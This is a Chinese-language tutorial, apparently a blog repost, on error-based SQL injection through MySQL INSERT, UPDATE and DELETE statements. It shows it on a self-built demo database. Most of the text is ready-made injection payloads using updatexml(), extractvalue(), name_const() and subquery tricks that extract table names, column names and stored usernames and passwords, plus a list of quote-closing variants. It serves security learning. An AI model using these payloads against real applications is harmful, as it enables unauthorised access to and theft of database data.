zoukankan      html  css  js  c++  java
  • 利用insert,update和delete注入获取数据

    0x00 简介


    利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括referer、client_ip、user-agent等,还有类似于用户注册、密码修改、信息删除等功能),还可以用如上方法获取我们需要的数据吗?在这里,我们以MYSQL的显错为例,看一下如何在insert、update、delete的注射点中获取我们想要的数据。

    0x01 环境搭建


    为了更好的演示注射效果,我们先利用下面的语句创建原始数据:

    create database newdb;
    use newdb;
    create table users(
    id int(3) not null auto_increment,
    username varchar(20) not null,
    password varchar(20)  not null,
    primary key (id)
    );
    insert into users values(1,'Jane','Eyre');
    

    enter image description here

    看一下当前数据结构:

    enter image description here

    0x02 注入语法


    因为我们这里是用的显错模式,所以思路就是在insert、update、delete语句中人为构造语法错误,利用如下语句:

    insert into users (id, username, password) values (2,''inject here'','Olivia');
    insert into users (id, username, password) values (2,""inject here"",'Olivia');
    

    enter image description here

    注意:大家看到本来是要填入username字段的地方,我们填了'inject here'和”inject here”两个字段来实现爆错,一个是单引号包含、一个是双引号包含,要根据实际的注入点灵活构造。

    0x03 利用updatexml()获取数据


    updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

    payload:

    or updatexml(1,concat(0x7e,(version())),0) or
    

    Insert:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
    

    enter image description here

    Update:

    UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';
    

    enter image description here

    Delete:

    DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
    

    enter image description here

    提取数据:

    由于篇幅有限,在insert、update、delete用法一致的时候,我会仅以insert为例说明。

    所用的payload为:

    or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or
    

    获取newdb数据库表名:

    enter image description here

    获取users表的列名:

    enter image description here

    利用insert获取users表的数据:

    enter image description here

    利用delete获取users表的数据:

    enter image description here

    我们可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据:

    enter image description here

    在这里,为了演示用update获取数据,我们临时再创建一个含有id,name,address的students表,并插入一条数据:

    enter image description here

    再次利用update获取users表的数据:

    enter image description here

    如果你碰到一个update的注入并且想获取当前表的数据的话,可用用双查询,我后面会讲到。

    0x04 利用extractvalue()获取数据


    extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数。

    payload:

    or extractvalue(1,concat(0x7e,database())) or
    

    Insert:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,database())) or'', 'Nervo');
    

    enter image description here

    update:

    UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Nervo';
    

    enter image description here

    delete:

    DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';
    

    enter image description here

    提取数据:

    同样,在insert、update、delete用法一致的时候,我会仅以insert为例说明。

    获取newdb数据库表名:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 1,1))) or'', 'Nervo');
    

    enter image description here

    获取users表的列名:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'', 'Nervo');
    

    enter image description here

    获取users表的数据:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1))) or '', 'Nervo');
    

    enter image description here

    同样,我们可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据。

    0x05 利用name_const()获取数据


    name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 , NAME_CONST() 促使该列使用给定名称。

    Payload:

    or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or
    

    Insert:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '','Nervo');
    

    update:

    UPDATE users SET password='Nicky' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Nervo';
    

    delete:

    DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a)or '';
    

    提取数据:

    在最新的MYSQL版本中,使用name_const()函数只能提取到数据库的版本信息。但是在一些比较旧的高于5.0.12(包括5.0.12)的MYSQL版本中,可以进一步提取更多数据。在这里我使用MySQL5.0.45进行演示。

    首先,我们做一个简单的SELECT查询,检查我们是否可以提取数据。

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');
    

    如果显示ERROR 1210 (HY000): Incorrect arguments to NAME_CONST,那就洗洗睡吧。。

    如果显示ERROR 1060 (42S21): Duplicate column name '2',就可以进一步获取更多数据。

    enter image description here

    获取newdb数据库表名:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo');
    
    ERROR 1060 (42S21): Duplicate column name 'users'
    

    获取users表的列名:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo');
    
    ERROR 1060 (42S21): Duplicate column name 'id'
    

    获取users表的数据:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit
    0,1),1))a) or '', 'Nervo');
    
    ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre'
    

    0x06 利用子查询注入


    原理与select查询时的显错注入一致。

    Insert:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Nervo');
    

    enter image description here

    update:

    UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
    

    enter image description here

    delete:

    DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ;
    

    enter image description here

    提取数据:

    获取newdb数据库表名:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '','Nervo');
    

    enter image description here

    获取users表的列名:

    INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
    

    enter image description here

    获取users表的数据:

    INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
    

    enter image description here

    0x07 更多闭合变种


    ' or (payload) or '
    ' and (payload) and '
    ' or (payload) and '
    ' or (payload) and '='
    '* (payload) *'
    ' or (payload) and '
    " – (payload) – "
    

    0x08 引用


    http://dev.mysql.com/

    http://websec.ca/kb/sql_injection

    from:http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

    转自:http://drops.wooyun.org/tips/2078

    学如逆水行舟,不进则退。
  • 相关阅读:
    在C#代码中应用Log4Net(二)典型的使用方式
    在C#代码中应用Log4Net(一)简单使用Log4Net
    Windows Azure Active Directory (2) Windows Azure AD基础
    Windows Azure Virtual Network (6) 设置Azure Virtual Machine固定公网IP (Virtual IP Address, VIP) (1)
    Windows Azure Active Directory (1) 前言
    Azure China (6) SAP 应用在华登陆 Windows Azure 公有云
    Microsoft Azure News(3) Azure新的基本实例上线 (Basic Virtual Machine)
    Microsoft Azure News(2) 在Microsoft Azure上运行SAP应用程序
    Microsoft Azure News(1) 新的数据中心Japan East, Japan West and Brazil South
    Windows Azure HandBook (2) Azure China提供的服务
  • 原文地址:https://www.cnblogs.com/dhsx/p/5014852.html
Copyright © 2011-2022 走看看